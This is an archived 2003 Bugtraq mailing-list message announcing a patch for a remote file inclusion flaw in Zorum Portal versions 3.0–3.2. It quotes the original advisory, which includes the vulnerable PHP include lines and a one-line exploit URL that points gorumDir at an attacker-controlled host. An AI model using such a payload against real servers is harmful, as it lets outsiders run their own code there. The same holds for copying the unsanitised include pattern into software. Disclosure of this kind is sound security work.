|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Frog Man (leseulfrog_at_hotmail.com)
Date: Sun Jan 26 2003 - 13:03:49 CST
A patch has been created for this hole and can be found on
http://www.phpsecure.org/.
>From: MGhz <magas
mail.lt>
>To: bugtraqsecurityfocus.com
>Subject: Zorum Portal (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magasmail.lt
_________________________________________________________________
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]